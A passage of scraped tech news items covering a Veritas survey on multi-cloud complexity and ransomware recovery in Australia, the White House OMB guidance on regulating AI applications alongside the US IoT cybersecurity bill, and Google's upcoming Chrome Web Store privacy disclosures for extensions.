According to the report, some 57% of Australian organisations run a multi-cloud environment and use between 15 and 20 cloud services. It indicated that 33% of organisations with more than 20 clouds paid a ransom in full, compared with 19% of businesses with fewer than five clouds.
    At the same time, the average number of clouds deployed by organisations who partly paid a ransom was 11.47, versus 6.17 for businesses who did not pay at all.
The survey, conducted in September 2020 with 150 Australian senior IT executives from companies of 1,000 employees or more, also showed that complex cloud architectures tend to slow recovery from a ransomware attack.
    While 41% of those businesses with fewer than five cloud providers in their infrastructure saw their operations disrupted by less than one day, 67% with over 20 clouds took five to 10 days to get back on track.

    “We’re seeing a lag between the rapid expansion of the threat surface that comes with increased multi-cloud adoption, and the deployment of data protection solutions needed to secure them,” Veritas Technologies managing director Howard Fyffe said.
    “Our research shows that Essential Eight compliance is critical. Fortunately, some businesses are investing to close that resiliency gap — but unless this is done at greater speed companies will remain vulnerable.”
    On the point of investment, over half of Australian businesses shared that they had increased their security budget due to the COVID-19 pandemic, with Veritas noting that those that did boost their security investment were able to restore their data faster.
    For instance, the company pointed to how 53% of Australian IT executives said they had spent more on security since the pandemic and were able to restore 90% or more of their data, compared with just 43% of those spending less. 
Nonetheless, the results suggest that there is more to be done, with the average business able to restore only 82% of its data, Veritas said.
When it came to the data protection tools in use, the most common were security and behavioural analytics tools, anti-virus software and endpoint security, and backing up data.
Australian organisations remain at risk of ransomware, but compared globally they fare better: respondents reported an average of 1.14 ransomware attacks, below the global average of 1.87.

  • in

    White House issues guidance for federal agencies on AI applications

US federal agencies have now been issued guidance by the White House on how to regulate artificial intelligence (AI) applications produced in the US.
    “This memorandum sets out policy considerations that should guide, to the extent permitted by law, regulatory and non-regulatory approaches to AI applications developed and deployed outside of the federal government,” stated Russell Vought, director of the Office of Management and Budget (OMB) in the memo [PDF] for all the heads of executive departments and agencies, including independent regulatory agencies.
    The OMB guidance comes 21 months after President Donald Trump signed an executive order to fast-track the development and regulation of AI in the US.
    President Trump at the time touted the executive order would see the launch of the American AI initiative, which would place US resources towards ensuring that AI technology is made locally.
    According to the guidance, the idea is to ensure that agencies do not introduce regulations and rules that “hamper AI innovation and growth”.
    “Where permitted by law, when deciding whether and how to regulate in an area that may affect AI applications, agencies should assess the effect of the potential regulation on Al innovation and growth,” it said.
    “While narrowly tailored and evidence-based regulations that address specific and identifiable risks could provide an enabling environment for US companies to maintain global competitiveness, agencies must avoid a precautionary approach that holds AI systems to an impossibly high standard such that society cannot enjoy their benefits and that could undermine America’s position as the global leader in AI innovation.”

    The guidance advises agencies to address inconsistent, burdensome, or duplicative state laws that could be hurting the national AI market. 
    “Where a uniform national standard for a specific aspect of AI is not essential, however, agencies should consider forgoing regulatory action,” it said.
    OMB listed 10 stewardship principles that federal agencies could use for AI applications. These were initially introduced as part of the draft memorandum released at the start of the year.
These principles include building public trust in AI by reducing accidents and protecting the privacy of individual AI users; encouraging public participation in how AI is applied; delivering scientific integrity and information quality; applying consistent risk assessment and management across agencies and technologies; maximising benefits and considering the costs of employing AI; pursuing flexible approaches to AI so as not to harm innovation; ensuring the technology is fair and non-discriminatory; ensuring transparency in disclosures; promoting the development of AI systems that are safe, secure and operate as intended; and ensuring agencies share their experiences of their approaches to AI.
    At the same time, OMB also provided examples of how agencies could take non-regulatory approaches to address potential AI risks, such as setting sector-specific policy guidance or frameworks, delivering pilot programs and experiments, or introducing voluntary consensus standards or frameworks.
    In order to ensure agency plans are consistent with the guidance, agencies are required to submit their compliance plans to the Office of Information and Regulatory Affairs by 17 May 2021, where they must identify their regulatory authorities, as well as AI-related information that is collected from entities they regulate.
    “The agency plan must also report on the outcomes of stakeholder engagements that identify existing regulatory barriers to AI applications and high-priority AI applications that are within an agency’s regulatory authorities. OMB also requests agencies to list and describe any planned or considered regulatory actions on AI,” the memo said.
    Earlier this week, the HR 1688 Internet of Things Cybersecurity Improvement Act of 2020 was unanimously passed in the Senate, just over a year after it was introduced in the House.
    Under the Bill, the National Institute of Standards and Technology will be required to develop and publish guidelines so that the federal government only buys and uses Internet of Things (IoT) devices that meet the new security rules, including adhering to minimum information security requirements for managing the cyber risks associated with IoT devices.
    The Bill noted some of the minimum considerations that should be covered in the guidelines include the secure development of IoT devices, identity management, patching, and configuration management.
    Once these guidelines are developed, the OMB will be responsible for issuing them to each agency, as well as for providing details on how each agency should report and publish information about security vulnerabilities, how to resolve them, and how to coordinate with other agencies.
    With the Bill now passed by the US Congress, it will be handed to the president to be signed. If it is, it will mark the first national approach to IoT security in the US. California approved its own version of an IoT security Bill back in 2018.

    Starting next year, Chrome extensions will show what data they collect from users

    Google said today it plans to add a new section on the Chrome Web Store where extension developers will be able to disclose what user data they’re collecting from users and what they plan to do with the information.
    The new section is set to go into effect on January 18, 2021, and will appear as a “Privacy practices” button on each extension’s Web Store listing.
    To aid the process, Google has added a new section today in the Web Store dashboard where extension developers will be able to disclose what data they collect from their users and for what purposes.

    Google’s new “data usage” dashboard will ship with a limited set of preset options, which will effectively prohibit Chrome developers from certain data practices, such as:
    • The bulk sale of user data, by ensuring the use or transfer of user data is for the primary benefit of the user and in accordance with the stated purpose of the extension.
    • The use or transfer of user data for personalized advertising.
    • The use or transfer of user data for creditworthiness or any form of lending qualification, and to data brokers or other information resellers.
    Google’s new “data disclosure” policy is not unique. At the WWDC 2020 developer conference in June this year, Apple announced that all App Store app listings will soon be required to include a “privacy prompt (label)” that will list all the data points apps collect from users and which data points are used to track users across apps.
    Apple’s privacy labels are scheduled to go live on December 8, next month.
    Google said it plans to show notices to all developers in the Web Store developer dashboards and prompt extension makers to set up a “privacy practices” section.